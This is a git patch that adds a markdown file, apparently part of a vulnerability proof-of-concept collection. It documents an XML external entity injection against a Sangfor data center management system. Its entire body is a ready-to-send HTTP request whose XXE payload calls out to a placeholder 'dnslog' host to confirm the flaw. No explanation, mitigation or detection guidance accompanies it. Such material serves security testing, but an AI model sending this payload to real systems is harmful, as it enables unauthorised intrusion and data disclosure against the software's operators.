From 0178db40e0c9b5321393a8fe4b72db05e32212c7 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 19 Aug 2023 20:35:28 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E6=B7=B1=E4=BF=A1=E6=9C=8D=E6=95=B0?=
 =?UTF-8?q?=E6=8D=AE=E4=B8=AD=E5=BF=83=E7=AE=A1=E7=90=86=E7=B3=BB=E7=BB=9F?=
 =?UTF-8?q?=20XML=20=E5=AE=9E=E4=BD=93=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E?=
 =?UTF-8?q?.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 深信服数据中心管理系统 XML 实体注入漏洞.md | 21 +++++++++++++++++++++
 1 file changed, 21 insertions(+)
 create mode 100644 深信服数据中心管理系统 XML 实体注入漏洞.md

diff --git a/深信服数据中心管理系统 XML 实体注入漏洞.md b/深信服数据中心管理系统 XML 实体注入漏洞.md
new file mode 100644
index 0000000..e7aba4f
--- /dev/null
+++ b/深信服数据中心管理系统 XML 实体注入漏洞.md	
@@ -0,0 +1,21 @@
+## 深信服数据中心管理系统 XML 实体注入漏洞
+```
+GET /src/sangforindex HTTP/1.1
+Host: ip:port
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko)
+Accept:
+text/xml,application/xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Content-Type: text/xml
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: Keep-alive
+Content-Length: 135
+<?xml version="1.0" encoding="utf-8" ?><!DOCTYPE root [
+<!ENTITY rootas SYSTEM "http://dnslog">
+]>
+<xxx>
+&rootas;
+</xxx>
+
+```